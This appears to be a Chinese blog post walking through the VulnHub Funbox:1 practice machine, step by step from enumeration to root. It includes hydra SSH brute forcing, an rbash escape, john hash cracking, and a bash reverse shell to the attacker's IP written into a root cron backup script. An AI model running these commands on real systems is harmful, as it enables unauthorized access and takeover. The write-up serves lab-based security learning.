vulnhub-wp-funbox1

这篇具有很好参考价值的文章主要介绍了vulnhub-wp-funbox1。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

vulnhub靶机wp系列之funbox:1

本文结构

  • 🔍 信息收集(Enumeration)
    • 🖳 主机发现(Host Discover)
    • 👁 端口扫描(Port Scan)
    • 🕵️ 服务探测(Service Detection)
  • 🚪🚶 获取权限(Foothold)
    • 💲 ssh获取shell(ssh get shell)
    • 🏃 rbash逃逸(rbash escape)
  • 🛡️ 权限提升(Privilege Escalation)
  • 🐇 兔子洞(rabbit hole)
  • 📖 推荐文章

🔍 信息收集(Enumeration)

🖳 主机发现(Host Discover)

我们使用netdiscover命令扫描kali的c段

netdiscover -r 192.168.61.0/24
  • -r 指定网段

vulnhub-wp-funbox1

发现目标机是192.168.61.7

👁 端口扫描(Port Scan)

我们使用nmap进行一个全扫描

nmap -p- 192.168.61.7 -sV 
  • -p- 扫描全端口 (注:这会产生比较大的流量)
  • -sV 探测端口服务

vulnhub-wp-funbox1

得到一个ftp,ssh,http还有一个类似mysql的服务

🕵️ 服务探测(Service Detection)

我们先从最简单的开始,http,访问目标的80端

vulnhub-wp-funbox1
发现被重定向到了一个未知的url,那我们修改hosts文件把这个url绑定到目标ip,然后重新访问

然后发现目标web的cms指纹是wp,那直接上专业工具 

vulnhub-wp-funbox1

我们使用wpscan对目标网站进行扫描

wpscan -e vp,vt,u --url http://funbox.fritz.box/
  • -e vp,vt,u指定使用主题漏洞扫描(vt),插件漏洞扫描(vp),用户扫描(u)
  • --url 指定扫描目标

vulnhub-wp-funbox1

发现枚举出了俩个用户,可以去登录界面试试弱口令

🚪🚶 获取权限(Foothold)

💲 ssh获取shell(ssh get shell)

经过尝试,发现用户joe有弱口令12345,那我们可以联想到是否ftp和ssh也有弱口令? 直接上hydra(九头蛇)爆破试试,注:在真实渗透测试中,我们应该尽量减少暴力破解的次数,或者应当在收集到了足够的信息再去爆破

hydra -l joe -P top1000.txt -v 192.168.61.7 ssh -t 4
  • -l 指定用户名
  • -P 指定密码字典
  • -v 指定详细信息输出,将会输出爆破进度
  • ip + 服务名
  • -t 指定线程为4,在ssh爆破时,应使用hydra推荐的线程数4

vulnhub-wp-funbox1

接下来我们就可以使用弱口令直接ssh登录joe用户

🏃 rbash逃逸(rbash escape)

我们可以发现,获取的是一个rbash,这个时候我们就要进行rbash逃逸。 注:这里的pspy64文件是我之前打靶的时候就已经下载了的文件

vulnhub-wp-funbox1

逃逸方法有很多种,我这里就用python来逃逸

python3 -c 'import pty;pty.spawn("/bin/bash")'

然后我们先看看mbox是个什么东西(一般自己家目录下都会有点东西提示) 

vulnhub-wp-funbox1

重点解读就是joe用户帮root用户写过一个脚本,还有joe用户将密码设成了12345

🛡️ 权限提升(Privilege Escalation)

然后我们就是找这个脚本,后经过一番寻找,我们最终在funny的家目录下发现了backup脚本,还有一个网站的打包文件

vulnhub-wp-funbox1

到了这,我们可以猜测这个就是joe用户写的脚本,脚本里面的内容是对/var/www/html目录进行打包。那就很明显了,和网站备份相关的计划任务。

为了验证我们的猜想,我们用pspy工具检测一下

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64
./pspy64 -d /home/funny
  • -d 指定要观察的目录 pspy(也称为"pspy64")是一个用于监视进程活动的工具,特别是在Linux环境中。它允许用户监视正在运行的进程,查看它们的活动和与文件系统的交互,以及与其他进程的通信。pspy是一个轻量级的工具,通常被用于安全审计和故障排除,也可以用于发现潜在的安全问题。

vulnhub-wp-funbox1

果然,是发现有一个root的计划任务和funny的计划任务,后面更是发现,root是5分钟执行一次,funny用户是2分钟执行一次

💀 反弹root shell(reverse root shell)

因为我们对backup有修改权限,我们直接在backup脚本中写入反弹shell的语句

bash -i >& /dev/tcp/192.168.61.126/1234 0>&1
  • bash -i 这部分启动Bash shell,并使用-i标志表示要以交互方式运行,这意味着它可以接收用户输入并显示输出
  • >& /dev/tcp/192.168.61.126/1234 这是一个重定向操作符,将Bash的标准输出和标准错误(1和2)都重定向到指定的IP地址和端口上的网络连接。具体来说,它将输出重定向到/dev/tcp/192.168.61.126/1234。
  • 0>&1 这也是一个重定向操作符,将标准输入(0)重定向到与标准输出相同的地方,也就是之前重定向到网络连接的位置。

这个命令的作用是将Bash shell的输入和输出连接到IP地址192.168.61.126上的端口1234,这通常用于建立与另一台计算机的反向Shell连接,使远程主机可以控制和执行命令在被攻击的主机上 这是一个常见的bash反弹shell的语句,然后我们在kali开启nc监听

nc -lnvp 1234
  • -l: 这是netcat的一个选项,用于指示netcat进入监听模式,即等待传入连接。
  • -n: 这是另一个选项,用于指示netcat不要执行DNS解析,以便更快地处理连接。
  • -v: 这是一个选项,用于启用详细的输出,通常用于调试目的。
  • -p: 指定netcat监听的端口号。在这个例子中,它监听端口1234。

vulnhub-wp-funbox1

多次监听后也是成功拿到了root的shell

🐇 兔子洞(rabbit hole)

一开始我们在wpscan扫描出来的另外一个用户,admin,我们拿到joe的shell后可以去网站目录下看wp的配置文件,然后进入数据库查看用户名和密码

vulnhub-wp-funbox1

接着我们把这个给复制出来,用john去爆破这个hash值

vulnhub-wp-funbox1

john pass.txt --wordlist=/usr/share/wordlists/rockyou.txt
  • pass.txt 将要破解的hash值写入一个文本文件
  • --wordlist= 指定密码字典为kali共享目录下的rockyou字典

vulnhub-wp-funbox1

爆破出来后我们可以看到是iubire,拿去登录看看

vulnhub-wp-funbox1

成功登录后我们可以试着看能不能用wp的漏洞去getshell,但是很显然在这里应该是拿不到root权限的,最多拿一个普通shell,或者说普通shell都拿不到 具体咋样还有待后续的尝试 待续

📖 推荐文章

国外大佬关于funbox:1的wp:funbox:1
rbash逃逸的方法:rbash逃逸
funbox:1靶机下载地址:下载

更多文章可前往我的博客
rightevil.github.io文章来源地址https://www.toymoban.com/news/detail-711573.html

到了这里,关于vulnhub-wp-funbox1的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • vulnhub-wp Billy Madison

    熟悉的netdiscover -r 目标机器是 192.168.134.45 使用nmap对其进行扫描 --min-rate 设置最小发包速度为8000,在靶场环境可以快速扫描出结果 一个个探测,经过尝试,smb服务中有一个txt文件,里面提示我们eric的后门以及关闭了。 23端口用telnet连接后,给了我们一个提示 这里给了一个

    2024年02月05日
    浏览(29)
  • vulnhub-wp Bob 1.0.1

    目标机器是: 192.168.234.47 nmap常规扫描端口 查看web页面,发现只是一个静态页面,查看源码也没有什么其他信息,然后在robots.txt中找到了一些信息 一个个访问,发现dev_shell是一个简单的webshell,可以远程执行我们的命令,但是过滤了一些,可以试试base64绕过 将第二条命

    2024年02月04日
    浏览(29)
  • FUNBOX_1靶场详解

    这个系列的靶场给出的干扰因素都挺多的,必须从中找到有用的线索才可以。 这个靶场你扫描到ip地址后打开网页会发现,ip自动转换成域名了,所以我们需要添加一条hosts解析才可以。 从目录扫描中可以看出这是一个wordpress的网站。 利用wpscan工具可以枚举wordpress的用户名。

    2024年02月15日
    浏览(29)
  • 【Vulnhub】搭建Vulnhub靶机

    Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 去vulnhub的官网 https://www.vulnhub.com可以看到各种镜像。 点击某一个进入我们可以看到关于镜像的详细信息,包括:镜像描述、难度等级、下载地址等。 通过下载地址下载完成

    2024年02月05日
    浏览(43)
  • vulnhub靶场实战系列(一)之vulnhub靶场介绍

    Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。 我们在学

    2024年02月10日
    浏览(38)
  • [wp]“古剑山”第一届全国大学生网络攻防大赛 Web部分wp

    群友说是原题杯 哈哈哈哈 我也不懂 我比赛打的少  Web | unse 源码: 先伪协议读取test.php 然后得到反序列化源码: a中的$this-a触发bgood中的__toString方法,将$this-a赋值为new bfun()。 bdun中的$items[‘dd’]触发cfun中的__get函数,给$items[‘dd’]赋值为new cfun()。 最后让cdun中的$params[‘

    2024年02月04日
    浏览(54)
  • 暗月ACK靶场 WP

    https://mp.weixin.qq.com/s/VB4elHdrHNCmPDP_ktcLRg https://www.bilibili.com/video/BV1264y187St?spm_id_from=333.1007.top_right_bar_window_history.content.click 按照文章拓扑根据实际情况搭建好,web2的其中一个网卡需要自己调一下ip 1、把 12server-web1 中 C:Hws.com/Hws/HostMaster/wwwroot/www.ackmoon.com/web/HdhApp.config 的 ip 地址换

    2024年01月23日
    浏览(36)
  • CTFshow-菜狗杯WP

    经过了48小时的奋战,在这次比赛中成功拿下4400分,同时也发现了自己的许多不足; 杂项签到 下载附件后进行解压,发现是一张图片,通过二进制查看工具(WinHex/010 Editor)打开该图片,Ctrl+F搜索文本\\\"ctfshow\\\",即可发现: ctfshow{a62b0b55682d81f7f652b26147c49040} 损坏的压缩包 通过

    2024年02月08日
    浏览(39)
  • ctfshow新手杯wp

    最近国庆在疯玩的时候抽空做了几题,简单记录一下。 打开题目发现,点击不了,打开F12控制台发现flag: 题目是一个带密码的压缩包,提示说密码为纯大小写。用工具爆破了一下午没有结果,本来干脆不做了,后面打开文件发现备注:阿尼亚会PINyin:哇库哇库! 直接尝试出

    2023年04月25日
    浏览(41)
  • ACTF 2023 部分WP

    来自密码手的哀嚎: 玩不了一点,太难了。 Description Malin’s Diffile-Hellman Key Exchange. task.sage output.txt 分析一下: shared = (sk_alice[0].T * pk_bob * sk_alice[1]).trace() 也就是说 shared = ((a 1 ) T  * b 1 * (b 2 ) T * a 2 ).trace() 已知 Pk_alice = a 1 * (a 2 ) T 和 Pk_bob = b 1 * (b 2 ) T 线性代数学的好的

    2024年02月06日
    浏览(37)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包